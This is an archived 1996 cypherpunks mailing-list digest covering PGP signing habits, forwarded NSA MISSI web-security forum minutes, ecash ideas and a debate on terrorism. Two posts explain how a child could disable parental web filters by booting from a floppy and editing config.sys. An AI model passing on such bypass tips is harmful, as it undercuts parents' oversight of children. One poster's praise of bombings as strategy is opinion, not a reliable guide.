From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 4 Jul 1996 11:25:22 +0800
To: "Mark M." <drosoff@arc.unm.edu>
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
Message-ID: <2.2.32.19960704003011.00f3be94@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:58 PM 7/3/96 -0400, Mark M. wrote:

>> I've wondered .. could a creative child circumvent these filter programs
>> using a URL-redirecter, like where you see something like
>> http://www.one.site.com/cgi-bin/rd?http://www.porno-site.com/
>> or are they not URL-based?
>
>If the child is creative enough, he will be able to boot DOS from a bootdisk
>and remove the line from config.sys that starts up the filtering software.

Or just remark it out and reboot.  Or does the filtering software make it so
they cannot use an editor as well...?

Sounds like a pretty easy thing to bypass given a small amount of clues.
(Makes me wonder how the usually clueless parents are going to block access
to their kids who usually understand the technology better than they do.)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 4 Jul 1996 08:57:48 +0800
To: cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
Message-ID: <199607032150.RAA24892@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Jul 96 at 9:31, nowhere@alpha.c2.org wrote:

> At 09:42 PM 7/2/96 EDT, Derek Atkins <warlord@MIT.EDU> wrote:

> :Basically, I refuse to type my passphrase over the net, which signing
> :all my messages (this one included) would require.

> Why, in heaven's name, would you have to "type your passphrase over
> the net" to encypher a message?

You need to type it in to SIGN a message.

(BTW, there's been an awful lot of messages posted with one line huge
paragraphs.  It's moderately inconvenient using Windows, but it's 
still a pain. Can you hit the Enter key or set word wrap on next 
time?)


Rob.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 4 Jul 1996 08:44:27 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: The Net and Terrorism
Message-ID: <199607032157.RAA25003@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  3 Jul 96 at 7:03, jim bell wrote:

> If you listen to the Feds discussing this most recent militia story, when 
> they're asked what was the militia's motivation, they don't want to talk 
> about it, and won't even speculate on more than the most unspecific, vacuous 
> terms.

How can they? It's also not their concern WHY they (allegedly) 
plotted to blow up buildings, only THAT they did so.

Rob.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 4 Jul 1996 05:36:27 +0800
To: cypherpunks@toad.com
Subject: Re: Lack of PGP signatures
Message-ID: <adffeef404021004ab24@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:38 AM 7/3/96, Brad Shantz wrote:

>Once upon a time last year or the year before, Tim May posted why he
>doesn't use PGP very often.  And I have always stood by that same
>sentiment.  Yes, it is a good encryption product, but it is not
>integrated seamlessly into other applications.  Tim, feel free to
>whack me if you think I'm speaking for you.  If, as cypherpunks, we
>want to spread the use of strong crypto, we need to have a better
>interface than what currently exists on PGP 2.6.2.

You are correct in your memory of what I said. My message is somewhere in
the archives...but the archives are of course no longer very available.

I'll make a few brief points:

1. PGP and other crypto tools are not well-integrated into Eudora,
Microsoft Mail, cc:Mail (or whatever), Netscape mail, etc. Sure, various
tools exist, but not out-of-the-box. (Proof that crypto confusion has been
a successful strategy for U.S. authorities.)

2. For me, using PGP means using MacPGP. This means cutting-and-pasting and
extra work. (Given that I often delete messages after only glancing at them
for 5 seconds or less, any additional work is not welcome.)

3. Of course, I will only _decrypt_ messages sent to me personally, for
obvious reasons. And given that I am very open about my political views and
am neither a money launderer nor a conspirator, nor a Horsemen of any other
flavor, most of the PGP-encrypted messages sent to me are banal and PGP use
was unneeded.

(After doing the mumbo jumbo to decrypt a message, I get crap like "Yo,
Tim, just wanted to say that PGP is, like, really kewl. Send me some
encrypted stuff.")

And so on.

I use PGP when I think it is necessary. As to using it _routinely_, at
least signing routinely and checking signatures routinely, it can't be
routine until it is routine.

Why isn't mail in the major e-mail packages _automatically_ signed? Look to
them for answers. Look to the NSA for more answers. Look to Dorothy Denning
for an explanation of why obstacles need to be placed in the path of wider
use of crypto.

(Note to Mac users: before any of you wastes your time composing a message
to me about a new package that makes links to MacPGP through AppleEvents,
it turns out that one has to first install a tool that is only commercially
available, for $$$. Again, obstacles have been placed in the path of easy
and wide use of crypto.)

Finally, a comment. I've never really bought the argument that we should
all be using PGP in all of our messages to set some kind of example or to
provide cover traffic. We don't have to set any kind of example, in my
cosmology. And the "cover traffic" is amply provided by an exponential
increase in Web traffic, alternate routes, new services, etc.

I think crypto tools need to be made easier to use (without installing
additional commercial tools which cost more than the mail package itself),
but until then I will feel no guilt about not using PGP more than I do.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@cybercash.com>
Date: Thu, 4 Jul 1996 09:57:56 +0800
To: cypherpunks@toad.com
Subject: Minutes Of the WWW I&A Forum
Message-ID: <2.2.32.19960703215331.00736f58@cybercash.com>
MIME-Version: 1.0
Content-Type: text/plain


>Return-Path: <NIEMCZUKJ@bah.com>
>Date: Wed, 03 Jul 1996  5:45pm
>From: "Niemczuk John" <NIEMCZUKJ@bah.com>
>To: vanbelld@bah.com, hapemand@bah.com, anthony.vitale@qmgate.trw.com,
>        balenson@tis.com, ballodi@paralon.com, bdorsey@v-one.com,
>        benner_tim@bah.com, bitting@mitre.org, bonatti@bah.com,
>        cme@cybercash.com, crowan@jgvandyke.com, cscrugg@spyrus.com,
>        dale@sctc.com, davidh@checkpoint.com, davids@checkpoint.com,
>        fred.unterberger@east.sun.com, ghilborn@csc.com, hecker@netscape.com,
>        hh@columbia.sparta.com, hittman@v-one.com, housley@spyrus.com,
>        hthomas@smiley.mitre.org, iolson@mitre.org, j_rolen@hud.gov,
>        jacksont@lfs.loral.com, jalexand@aero.org, james.prohaska@litronic.com,
>        janispel@caas.com, janisple@caas.com, jbiggs@csc.com,
>        jfurlong@mitre.org, jharrell@centech.com, jim.beattie@network.com,
>        jim@lsli.com, jmat@vnet.ibm.com, jmyers@mitre.org, jswang@v-one.com,
>        kearny@betuvic1.vnet.ibm.com, khrose@annap.infi.net,
>        khutton@lfs.loral.com, kurowski@lfs.loral.com, lnotargi@us.oracle.com,
>        louden@mitre.org, luther@sware.com, migues_sammy@prc.com,
>        mikez@secureware.com, mjm@reston.ans.net, mkrenzin@mail.hcsc.com,
>        mmancuso@v-one.com, mulvihil@smiley.mitre.org, netland@scc.com,
>        olkowskid@comm.hq.af.mil, oswald@columbia.sparta.com, pguay@mitre.org,
>        price_bill@prc.com, ray@sesi.com, sferry@raptor.com,
>        shlomo@checkpoint.com, sledgerw@bdm.com, smith@sctc.com,
>        tcfarin@sed.csc.com, tehrsam@us.oracle.com, thomps1r@ncr.disa.mil,
>        vritts@cscmail.csc.com, watt@sware.com, wneugent@smiley.mitre.org,
>        woycke@mitre.org
>Cc: jhsteve@missi.ncsc.mil
>Subject: Minutes Of the WWW I&A Forum
>
>                          Multilevel Information Systems Security Initiative 
>(MISSI)
>                               Identification and Authentication (I&A) Forum
>                                          3 June 1996, Meeting Minutes
>
>     The theme of this I&A Forum was security for the World Wide Web (WWW). 
> The following was the agenda for the meeting:
>
> -    Introduction - Dave Luddy, National Security Agency (NSA)
> -    Web Technology Overview - Dave Dodge, NSA
> -    INTELINK Security Needs - Susanne Rosewell, ISMC
> -    Mitre Corporate Experiences Using The Web (An Information Security 
>[INFOSEC] Point Of View) - Michael Louden, Mitre
> -     Security Policy Summary - Dale Hapeman, Booz, Allen & Hamilton
> -    Internet Engineering Task Force (IETF)/Worldwide Web Consortium (W3C) 
>Secure   Web Standard Activities - Judy Furlong, Mitre
> -   Netscape and Web Security - Frank Hecker, Netscape
> -   Protecting Web Sites From Attack - Dr. Rick Smith,  Secure Computing 
>Corporation
> -   Security products For WWW Applications - Mike Zauzig, SecureWare
> -   WWW Access (Attempting Solutions) - Dale Hapeman, Booz, Allen & Hamilton
> -   Forum Wrap-up - Dave Luddy, NSA
>
>     Mr. Dave Luddy, the Forum Chairperson, opened the meeting with an 
>overview of the forum.  He discussed:
> -   The goal of the forum is "to insure the commercial availability of 
>affordable I&A solutions that meet our customer's security, performance, 
>interoperability, and security management needs."
> -   The focus is on MISSI FORTEZZA based solutions.
> -   The development of an I&A Concept Of Operations (CONOPS) will be used as 
>the means of capturing I&A requirements for WWW access and other network 
>applications.
> -   The forum participants and modus operandi are documented in the I&A 
>Forum Charter.
>
>     Mr. Dave Dodge, from the Operations Directorate of NSA, presented an 
>introduction to the WWW technology.  Mr. Dodge presented an overview of:
> -   The Hypertext Transport Protocol (HTTP) which is one of the most 
>flexible tools for navigating the Internet.
> -   Uniform Resource Locators (URLs) which allow a user to identify the 
>location of a resource and the method used to retrieve it.
> -   The HyperText Mark-up Language (HTML) which is used to format Web pages 
>and present URLs to users.
> -   The Common Gateway Interface (CGI) which allows programs run on a server 
>to receive data from a user via an HTTP connection.
> -   JAVA which allows a program to be moved from the server to a client and 
>then executed on the client.  JAVA is designed to "protect you from itself". 
> It has checks that are made during execution.  JAVA is not universally 
>implemented yet.  There is no tag in the HTML
> -   The Secure Socket Layer (SSL)
> -   The Secure-HTTP (S-HTTP)
>
>Questions and Answers:
>Q:   Is a firewall able to differentiate an access made by a user from an 
>access originated by a JAVA applet?
>A:   (from Dave Dodge and Frank Hecker): No.  A JAVA applet can open any 
>random port to the server that provided it.
>Q:   Can a JAVA applet make an access through a proxy?
>A:   (from Frank Hecker).  Either the applet needs to know about that proxy 
>ahead of time or it can make use of the existing HTTP browser.
>Q:   Do search engines present any special I&A issues?
>A:   Most search engines are implemented using the GET or POST HTTP commands 
>which feed a program running on the server.  Control of access to that 
>program is the same as access to any Web page.
>Q:   Is there an IETF Working Group (WG) for WWW?
>A:   The W3C is an industry consortia that deals with Web issues (it's 
>responsible for the new HTML standard).  There are many IETF WGs and 
>standards related to Web topics.
>
>     Ms. Susanne Rosewell, from the ISMC Security office presented a 
>briefing on INTELINK security needs.  She pointed out that there is a panel 
>working on security issues that meets monthly. They are supported by several 
>WGs that are addressing:
> -   JAVA
> -   Access Control
> -   Firewalls
> -   Inter Domain security
>
>     Ms. Rosewell discussed some of the security issues and goals related to 
>INTELINK:
> -   Currently, Local Administrators provide security by reviewing server 
>logs to track who has had access to a server (i.e., no access control). 
> INTELINK would like to provide access control at the "front door" and not 
>at individual servers.
> -   They are looking at using X.509 Version 3 certificates to provide the 
>ability to limit access to no foreign (NOFORN) information.  They also want 
>to use X.509 certificates to identify community of interest (COI).
> -   The Inter Domain WG is investigating the use of commercial off-the-shelf 
>(COTS) multi-level security (MLS) servers to allow a Secret user to access 
>Secret and below data from a server that also contains Top Secret data.
> -   A long term goal is to provide "true data labeling" so that data may 
>carry and maintain a sensitivity label.
>
>Questions and Answers:
>Q:   Isn't it harder to get Secret data into a Top Secret enclave than to 
>get Secret data out of  a Top Secret enclave?
>A:   Yes.
>Q:   Is the goal to provide servers that contain both Top Secret and Secret 
>data that is connected to both (S and TS) networks?
>A:   Yes.
>Q:   Is data aggregation an issue?
>A:   Current efforts are to only label individual data objects.
>Q:   How will an individual user determine what technology to use and when 
>to upgrade?
>A:   INTELINK will be mandating a SSL capable browser in the future and is 
>asking people to comply with that requirement now.
>Q:   Will the INTELINK e-mail solution be Simple Mail Transfer Protocol 
>(SMTP) or X.400.
>A:   The E-mail application package that INTELINK will standardize on is 
>still an issue.  They need a application now and consider SMTP as the only 
>current option. X.400 applications (from the Defense Message System [DMS]) 
>are somewhere down the road.
>Q:   Commercial MLS servers are not readily available, the market has not 
>been established. How will INTELINK obtain COTS MLS servers?
>A:   There are a few MLS workstations available.  INTELINK is working with 
>NSA and vendors to solve this issue.
>Q:   INTELINK is requiring the use of Version 3 X.509 certificates, DMS has 
>an infrastructure based on Version 1 certificates.  Is anyone working on 
>solving this issue.
>A:   There is an INTELINK representative on the MISSI Key Privilege & 
>Certificate WG (KP&CWG) which is working on the problem of incompatible 
>X.500 infrastructures.  Conversion from Version 1 to Version 3 X.509 
>certificates is a transition issue for DMS.  The issue is the timing of the 
>conversion to Version 3 certificates.  There was never any intention to 
>interoperate between the two versions.
>
>     Mr. Michael Louden, who is involved with Mitre corporate management of 
>computer and network operations briefed "A Corporate Experience Using The 
>Web (An INFOSEC Point Of View).  The briefing provided an overview of the 
>Mitre Information Infrastructure (MII).  In the area of security, the 
>briefing included the MII security environment, key security features, 
>security trade-offs, and security issues. Miter has different access control 
>mechanisms (e.g., Passwords, Tickets) for different servers and would like 
>to centralize/standardize the access control mechanisms.
>
>Questions and Answers:
>Q:   When Mitre splits into two separate organizations, will you have to 
>totally rework your access control rights?
>A:   Mitre plans to duplicate the access control system and then delete the 
>individuals from the other organization.
>
>     Mr. Dale Hapeman, the Booz(Allen I&A task leader, presented a briefing 
>on "Sensitive But Unclassified (SBU) WWW Requirements."  He started the 
>brief by reviewing the Context Diagram from the I&A CONOPS and presented an 
>operational environment which showed Web clients an servers relative to SBU 
>enclaves.  Mr. Hapeman followed with an explanation of how each facet of a 
>MISSI security policy could be applied to data as it is being transferred 
>between a Client and Server through multiple firewalls.  He provided 
>definitions of Authorized and Authenticated.  Mr. Hapeman finished with an 
>invitation to the audience to consider the policies they would like to see 
>implemented at the different components involved in a WWW access (client, 
>server, and firewall).
>
>     Ms. Judith Furlong is a lead INFOSEC Engineer at the Mitre corporation. 
>She presented a briefing titled "IETF/W3C Secure Web Standards Activity." 
> Ms. Furlong started her briefing with a discussion of the following 
>existing Web security standards
> -   SSL Protocol
> -   S-HTTP
> -   Private Communication Technology (PCT) protocol
> -   Secure Electronic Transaction (SET) Protocol
>
>     Ms. Furlong followed with an overview of the W3C, including a 
>discussion of the W3C Security WG. Ms. Furlong covered:
> -   The Protocol Extension Protocol (PEP), a W3C proposal for extending HTTP 
>to accommodate additional capabilities such as security, watermarks, 
>labeling etc. She further described the Security Extension Architecture 
>(SEA) using the proposed PEP.
> -   The Joint Electronic Payment Initiative (JEPI), a joint WG between the 
>W3C's Electronic Payments WG and CommerceNet which is developing an Internet 
>payment protocol negotiation scheme and a standard interface for payment 
>modules.
> -   The Digital Signature Initiative which deals with issues associated with 
>applying digital signatures to objects such as video frames.
> -   The Platform for Internet Content Selection (PICS) WG which has the 
>charter to design technology to support "values-based" content 
>rating/labeling. The PICS technology has security applicability.
>
>     Ms. Furlong provided an overview of the IETF and its Web Transaction 
>Security (WTS) and Transport Layer Security (TLS) WGs.
>     She completed her briefing with a discussion of the following security 
>areas not being addressed by standards efforts:
> -   Secure Search capabilities
> -   Mobile Code Security
> -   Security Management Functions
> -   Interfaces to Security Infrastructures
>
>     Mr. Frank Hecker, a senior systems engineer with Netscape 
>Communications Corporation, presented a briefing on Netscape and Web 
>Security.   The briefing covered the security areas and technologies that 
>Netscape is active in.  Mr. Hecker started with a discussion of SSL and how 
>Netscape has improved it through upgrades to their Navigator software as 
>well as additional SSL issues they are investigating.  He also covered 
>Netscape's security related issues:
> -   Support for hardware tokens other than FORTEZZA.
> -   Making a browser "firewall aware" (e.g., able to authenticate to 
>intermediate firewalls) without becoming susceptible to man-in-the-middle 
>attacks.
> -   Providing directory services for use by many different types of 
>applications.
> -   Downloadable applications (JAVA and JAVASCRIPT)
> -   Financial transactions - Netscape will implement SET
> -   Secure e-mail - S/multipurpose internet mail extensions (MIME) 
>(initially not FORTEZZA)
> -   Public key infrastructure - Committed to X.509 Version 3 Certificates
> -   User and/or administrator configurability - Netscape will have a toolkit 
>to support Navigator 3.0.
>
>Questions and Answers:
>Q:   What are Netscape's plans for supporting applications other than Web 
>browsing over SSL connections?
>A:   Netscape currently implements HTTP, NNTP over SSL.  They plan on 
>implementing lightweight directory access protocol (LDAP) over SSL in the 
>future.  file ransfer protocol (FTP), TELNET, and SMTP/POP3/IMAP4 are 
>possible but not planned.  Other vendors or individuals have implemented 
>TELNET and FTP over SSL.
>Q:   How does a user deal with non-SSL servers or optionally implementing 
>SSL on a connection?
>A:   A page that must be accessed with SSL is designated with a URL starting 
>with https:// (instead of http://).
>
>     Dr. Rick Smith an information security consultant with Secure Computing 
>Corporation presented a briefing titled "Protecting Web Sites From Attack". 
> Dr. Smith started his presentation with a history of some of the more well 
>known sever penetrations.  Dr. Smith discussed several types of attacks and 
>methods of protection with Type Enforcement Encapsulation.
>
>Questions and Answers:
>Q:   Where are the tables used for type enforcement defined?
>A:   There is an Administrators Tool that includes this function.
>Q:   How many domains and types can Sidewinder implement?
>A:   Dozens.
>
>     Mr. Mike Zauzig, a senior products development engineer with 
>SecureWare,  presented a briefing on "Security Products For WWW 
>Applications."  Mr. Zauzig provided an overview of  his company, aspects to 
>web security, and the following SecureWare products:
> -   Hannah - Network Security
> -   Troy - Platform Integrity Assurance
> -   SecureMail - E-mail Security
> -   Secure Web Platform Integrity - Safe Web Server
> -   Interceptor - Transmission Control Protocol (TCP)/IP Firewall
> -   Internet Scanner - Attack Simulator
>
>Questions and Answers:
>Q:   Is SecureWare's mail package interoperable with other FORTEZZA e-mail 
>implementations.
>A:   Yes (Dave Luddy).
>Q:   The Security First Network Bank shows a Web server that is connected to 
>directly the Internet (not through the firewall).  Is this machine running 
>SSL on one side and Hannah on the other?
>A:   Yes.
>
>     Mr. Hapeman presented a briefing which attempted to summarize the 
>security requirements presented at the day's meeting.  He reviewed the 
>security services needed and the requirements that are allocated to 
>components.  He also discussed the protocol requirements and possible 
>solutions available to secure the Web.  Different options for authenticating 
>to firewalls placed between clients and servers were presented.  Much work 
>remains to secure the proxy or tunneling solutions.
>
>Questions and Answers:
>Q:   The Internet Protocol Security (IPSec) protocol has not been mentioned 
>all day.  It is very mature and has had much NSA input (especially the 
>Internet Security Association and Key Management Protocol [ISAKMP] key 
>management protocol).  It should be considered as a security solution.
>A:   Agreed.  IPSec is a viable option, especially for authenticated 
>firewall-to-firewall connections.  It was not mentioned by name but is 
>certainly being considered as a solution.
>
>     Mr. Luddy's closing comments were:
> -   NIST FIPS PUB JJJ has been discussed at previous I&A Forums.  Although 
>it presents an authentication scheme, it does not provide for interoperable 
>solutions.  Dave Kemp has authored a Public Key Login Protocol that provides 
>the detail needed for interoperability.  The document will be submitted as 
>an IETF Internet draft.  Comments are solicited.
> -   The I&A CONOPS document will be sent out by e-mail to everyone who 
>registered.
> -   The topic for the next I&A Forum is Access Control.  It is scheduled for 
>8-9 July 1996.
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 4 Jul 1996 09:22:06 +0800
To: cypherpunks@toad.com
Subject: ecash thoughts
Message-ID: <Pine.SUN.3.91.960703172059.5948A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


1) Current ecash systems require live verification of coins, which 
will require banks to perform public key operations at around the 100K 
PKOP/s level, as well as all the headaches caused by the serial number 
lookup. 

Would anybody care to price up a system to handle this kind of traffic, 
assuming that coins can be given relatively short maximum lifetimes to 
keep the number of serial numbers in use within semi-reasonable limits. 
I'm wondering what the breakeven point is for only doing statistical 
sampling when verifying low value coins.

2) If ecash is used to create a new currency- i.e. the value of a unit of 
the ecash is not tied to any single existing currency, what should the 
value of one currency unit  be set at? (let's call it a Turing)

If the currency is run to be as anti inflationary as possible (e.g. 
backed by index-linked government securities), one Turing should buy the 
same amount of goods for a long long time, though relative prices may 
change. What value is likely to give the most convienient prices to the 
most goods? (e.g. +/- powers of two).

3) Not ecash, but still banking [noise]

I'm currently visiting at my parents house in England, which for the past 
18 years has had a really nice phone number. Unfortunately, BT split 
london into two area codes, and have reallocated the exchange number in 
the other one to citibank. Unfortunately, not many of their customers can 
quite cope with the concept of area-codes. Even more unfortunately, 
neither can BT or citibanks telcom group- we've had calls transferred 
from their switchboard straight through to us. 

Now, here comes the test for cp ingenuity - can you think of the best way 
to answer the phone to someone who things they've called a bank?

Ones I've used so far, when I've been really pissed off are:

Oh, I'm sorry - haven't you heard? They've filed for chapter 11. I'm from 
the Federal Reserve- I'm working with the recievers - can I possibly help 
you? [response was a disappointing "Good Heavens! Really?" ]

and the simple, yet subtle Lovecraftian terror of:

CitiBank, Nick Leeson speaking. [pause, giggle, must have a wrong number, 
click]

Any more suggestions? 

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 4 Jul 1996 05:51:42 +0800
To: cypherpunks@toad.com
Subject: Re: The Net and Terrorism
Message-ID: <adfff6be050210047fa0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:00 AM 7/3/96, Vladimir Z. Nuri wrote:

>of course. but what TCM's writing often seems to hide is a cynicism
>about these conditions. "there's nothing we can do about it. buy
>a bulletproof jacket and avoid crowed downtown areas". I'm saying
>this cynicism and isolationism tends to make the problem worse,
>not better. you clearly agree that we must find the reasons that
>terrorists are being bred, and work to eliminate those conditions.
>TCM apparently would feel that such a thing is a waste of time.

Well, I've written many dozens of articles on this issue (and many
thousands of articles overall).

My article made my points, so I won't rewrite it here. You are of course
not required to agree. You are free to live in crowded cites--near "soft
targets." You are welcome to lobby for world peace and for economic changes
to lessen terrorism.

(I think this is mostly hopeless. No matter how "nice" conditions get, for
game-theoretic reasons there will be some groups seeking changes.)

>another thing that annoys me about the TCM slant or "spin" is the
>pervasive connotation in his writing that terrorism is going
>to get far worse in the future. if so, I would say that is because
>world conditions that breed terrorists are getting far worse. he
>seems to convey the idea that the world is a nonsensical place
>where things, like increases in terrorism, occur for no particular
>reason.

I've never made any claims, explicit or implicit, that such acts are "for
no particular reason." Various groups--religious, political, corporate,
etc.--see advantages and disadvantages in various course of action. (This
sounds nebulous, but I am trying to avoid citing specific examples; I'm
trying to separate out the reactions people have to specific camps and look
at the bigger picture.)

>keep in mind that Ruby Ridge and Waco happened only a few years
>ago. that's a nanosecond in cosmic time, yet the terrorist
>repercussions are being felt immediately. I would say its very
>visceral evidene that terrorists are responding to events and
>are not just madmen out for the fun of killing people.  there's
>a bit of that of course..

Straw man. I never claimed that terrorists are doing it just for the fun of
it. The "terrorist" bomb that killed 230 American soldiers in Beirut in
1983 was done for "good" reasons ("good" in the sense of advancing their
goals)--that bomb triggered an almost immediate departure of Americans from
Beirut. Mission accomplished. (I also don't call that attack a "terrorist"
event, given the target and the state of war extant.)

Classical terrorism, such as that of the Bologna train station bombing by
the P2 Lodge, also advances political goals. It is not done "randomly," or
"for the fun of it."


>no, I specifically reject that insanity and violence are "normal"
>aspects of human behavior. merely because they have been around
>for centuries does not prove they are normal, only how warped
>the world has become such that abnormality is considered normal.

You and others are of course welcome to lobby for people to be nice to each
other. Peace and brotherhood, rah rah.

I believe there are basic game-theoretic reasons which make conflict and
jockeying for power "not surprising."

>the point is that there is no physical strategic value from bombing
>symbols.  I was making the point that terrorism is extremely symbolic

And the bombing in Beirut is explained how?

Bear in mind that the British thought the Colonial tactic of shooting at
them from behind trees--a "terrorist" tactic borrowed from the Indians who
used it on the colonists--was immoral and unsportsmanlike. Ditto our
feeling that the "sneak attack" on Pearl Harbor was immoral. I take the
meta-view that the attack on Pearl Harbor was brilliantly carried-out
military strategy, just as the bombing of the Marine barracks in Beirut was
brilliantly carried-out military strategy.

>
>bzzzzzzt. what I am pointing out is that what Tim is essentially saying,
>as you seem to be, that trying to combat terrorism is a waste of time
>because it is a fact of life, is erroneous in my view. it is a common
>libertarian argument that goes, "criminality is everywhere, so why try
>to stop it?"  a rather juvenile ideology.  may you live in your reality and
>see what it is like. hint: the current one we are living in is not
>one in which the government does not try to fight terrorism.

You really need read up on the "strategy of tension," esp. the writings of
Stefano Dellechiai (sp?) and the Russian "anarchists" of the late 19th
century. Also, the role the CIA played in funding former German commando
Otto Skorzeny in setting up "terrorist" groups in the 1950s and 60s.

Basically, one of the things terrorists want to do is to provoke a
crackdown by the ruling authorities, making things so bad that a
counterrevolution occurs. They believe they will reap the rewards of such a
counterevolution (or revolution, as it need not be "counter"). You can all
fill in the way this worked for leftists hoping for a leftist revolution
(Sindero Luminoso being the exemplar here) and rightists hoping that things
will get so bad that a fascist or rightist revolution will occur (P2 being
an example).

My main point in my essay was that violence and authoritarianism are all
around us, and that responding to the attacking of "soft targets" by
cracking down on basic liberties is NOT something we should endorse. Taking
responsibility for our own protection is preferable.

(And my point about moving out of cities referred to what *I* am doing;
others are of course free to mingle in crowded markets, hoping that the
bombs won't come that day. Others are free to send their children to day
care centers located in likely targets for ZOG's enemies to bomb, and so
on.)


>because, from my past experience, it seems Timmy's wildest
>fantasies are always contained in the paragraphs
>in which he says, "now, I'm not advocating this or anything...."

If you can't make your points reasonably and convincingly, I see that you
once again make ad hominem arguments. Calling me "Timmy" is not terribly
effective.

--Timmy


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Thu, 4 Jul 1996 09:54:19 +0800
To: David Rosoff <drosoff@arc.unm.edu>
Subject: Re: CWD -- Jacking in from the "Keys to the Kingdom" Port
In-Reply-To: <1.5.4.16.19960703170027.5fc7bc80@arc.unm.edu>
Message-ID: <Pine.LNX.3.94.960703185604.153A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 3 Jul 1996, David Rosoff wrote:

> At 12.10 AM 7/3/96 -0500, Declan McCullagh wrote:
> 
> >CyberWire Dispatch // Copyright (c) 1996 //
> 
> >Install the programs and Junior can't access porn. No fuss, no muss, no
> >bother. "Parental empowerment" is the buzzword. Indeed, it was these
> >programs that helped sway the three-judge panel in Philly to knock down
> >the Communications Decency Act as unconstitutional.
> 
> I've wondered .. could a creative child circumvent these filter programs
> using a URL-redirecter, like where you see something like
> http://www.one.site.com/cgi-bin/rd?http://www.porno-site.com/
> or are they not URL-based?

If the child is creative enough, he will be able to boot DOS from a bootdisk
and remove the line from config.sys that starts up the filtering software.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMdr7NLZc+sv5siulAQERvQP/YyzeV1YtbR0ba0RkiosU/r6kzDDJeDSc
OllJ4dAwlRAvJgNdlbX0aa0pQ47e7QNDu6yZsUv2j1MfJSvVcNlMLIWIaWP0lEvJ
4L+Oedxearr6fSwjgDa40Tv+/hWC3qwV7QHLKriRuyQxDE7nWbz8wMl2G1i91rAg
a5dD8JrALeg=
=RucL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 4 Jul 1996 12:28:22 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Net and Terrorism.
In-Reply-To: <adfea141010210040a34@[205.199.118.202]>
Message-ID: <Pine.LNX.3.93.960702200153.383A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jul 1996, Timothy C. May wrote:
> At 6:58 AM 7/2/96, snow wrote:
> >T.C. May wrote:
> >Can anything be done? To stop the likely effects of lots more
> >surface-to-air missiles, lots more nerve gas available on the black market,
> >and so on?
> >In a word, "no."
> >/*
> >     I disagree. Terrorism, political terrorism is fear. There are ways to
> >protect military targets that are quite cost effective, unfortunately they
> >are politically unpopular. (What just happend in Saudi is on my mind.
> >STUPID military commanders getting the same pie in the face time and time
> >again. There is NOTHING so unchanging as the military mind set.)
> 
> Well, attacks on military targets are almost, by definition, not
> "terrorism." (I'll spare the list a debate about the semantics; U.S.
> journalists tend to refer to anything done to "us" as "terrorism," whether
